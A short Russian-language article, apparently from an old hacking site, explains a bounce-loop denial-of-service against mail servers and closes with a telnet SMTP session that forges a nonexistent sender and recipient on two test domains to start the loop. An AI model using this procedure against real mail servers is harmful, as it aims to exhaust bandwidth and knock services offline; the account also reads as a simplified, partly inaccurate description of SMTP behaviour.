В заголовок этой статьи
вынесено название-аббревиатура хитрого
устройства, генерирующего узкий пучок лучей
высокой энергии. Какое же отношение этот прибор
имеет к компьютерной безопасности?
Вам всем знаком протокол SMTP — для пересылки почты.
Иногда, отправляя сообщения на адрес и сделав
ошибку, вы получали ответ от сервера с пометкой,
что письмо доставить не удалось. Казалось бы,
совершенно нормальная вещь.
Когда мы отправляем с адреса non_existent@test1.com письмо
на адрес non_existent@test2.com sendmail на сервере test2.com видит,
что письмо не может быть принято (такого юзера
нет и в помине ) и отсылает письмо обрато, добавив
туда сообщение о дате, времени ошибки USER NOT FOUND.
Письмо возвращается на домен test1.com, обрастает
дополнительной информацией …процесс
повторяется
Когда объём письма возрастает настолько, что,
ходя между test1.com и test2.com на его передачу уходит
львиная доля имеющегося bandwidth’a , один из серверов
не выдерживает нагрузки и падает. Я лично
наблюдал за процессом, как пинг до одного из
доменов увеличивался, увеличивался…пока не
начался сплошной timed out.
А теперь — сценарий в действии:
$ telnet some.mailserver.com 25
220 ESMTP (sendmail 8.8.9) ready
HELO www.test1.com
250 OK
MAIL FROM: non_existent@test1.com
250 user non_existent OK
RCPT TO: non_existent@test2.com
250 reciptient non_existent OK
DATA
354 Send data. End with CRLF.CRLF
blah
QUIT |